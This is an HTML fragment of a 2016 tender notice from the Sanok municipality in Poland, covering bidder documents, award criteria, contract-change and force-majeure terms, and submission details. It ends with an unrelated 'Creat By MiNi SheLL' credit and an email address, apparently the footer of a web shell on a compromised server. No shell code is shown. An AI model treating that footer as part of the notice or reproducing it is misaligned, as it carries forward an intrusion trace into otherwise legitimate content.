<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>formularz oferty, kosztorys ofertowy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin płatności faktury - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W przypadku konieczności dopuszczalna jest zmiana postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, jeżeli zmiany wynikają z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy lub zmiany te są korzystne dla zamawiającego. Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, w przypadku wystąpienia co najmniej jednej okoliczności wymienionych poniżej, z uwzględnieniem warunków ich wprowadzenia: 1. Zmiana terminu realizacji przedmiotu umowy: 1) zmiany spowodowane warunkami atmosferycznymi: a) warunki atmosferyczne uniemożliwiające prowadzenie robót , przeprowadzanie prób i sprawdzeń, dokonywanie odbiorów ( silne mrozy poniżej -20oC, opady powyżej 200 mm/mies.) b) siły wyższej. 2) zmiany będące następstwem okoliczności leżących po stronie zamawiającego: a) wstrzymanie robót przez zamawiającego, 3) konieczność wykonania robót dodatkowych. 4) kolizja z planowanymi lub równolegle prowadzonymi przez inne podmioty inwestycji. W przypadku wystąpienia którejkolwiek z okoliczności wymienionych w ust. 1 termin wykonania umowy może ulec odpowiedniemu przedłużeniu o czas niezbędny do zakończenia wykonywania jej przedmiotu w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności. 2. Pozostałe zmiany: Rezygnacja przez zamawiającego z realizacji części przedmiotu umowy - w takim przypadku wynagrodzenie przysługujące wykonawcy zostanie pomniejszone, przy czym zamawiający zapłaci za wszystkie spełnione świadczenia oraz udokumentowane koszty, które wykonawca poniósł w związku z wynikającymi z umowy świadczeniami, 3. Siła wyższa jest to zdarzenie, którego strony nie mogły przewidzieć, któremu nie mogły zapobiec, ani któremu nie mogą przeciwdziałać, a które uniemożliwia wykonawcy wykonanie w części lub w całości jego zobowiązań. Siła wyższa obejmuje w szczególności, następujące zdarzenia: a) wojna, działania wojenne, działania wrogów zewnętrznych; b) terroryzm, rewolucja, przewrót wojskowy lub cywilny, wojna domowa; c) skutki zastosowania amunicji wojskowej, materiałów wybuchowych, skażenie radioaktywne, z wyjątkiem tych które mogą być spowodowane użyciem ich przez wykonawcę; d) klęski żywiołowe, jak huragany, powodzie, trzęsienie ziemi; e) bunty, niepokoje, strajki, okupacje budowy przez osoby inne niż pracownicy wykonawcy i jego podwykonawców. Jeżeli wykonanie umowy jest niemożliwe z powodu wydarzenia stanowiącego działanie siły wyższej zdefiniowanej to zamawiający zaświadczy, że wykonanie umowy nie jest możliwe. Wykonawca, po otrzymaniu takiego świadectwa, tak szybko jak to możliwe zabezpieczy teren budowy i wstrzyma roboty, a zamawiający zapłaci wynagrodzenie za całość robót wykonanych przed otrzymaniem takiego świadectwa. W przedstawionych zdarzeniach w przypadku wystąpienia opóźnień strony ustalą nowe terminy realizacji z tym, że minimalny okres przesunięcia terminu zakończenia równy będzie okresowi przerwy lub postoju. Warunki zmian: wszelkie zmiany wymagają formy pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gmina.sanok.com.pl/bip/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Sanok, ul. Kościuszki 23, 38-500 Sanok; IV piętro, pok. 401 w godz. 7:30-15:30 od poniedziałku do piątku..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.06.2016 godzina 12:00, miejsce: Urząd Gminy Sanok, ul. Kościuszki 23, 38-500 Sanok; II piętro, pok. 201 (sekretariat)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com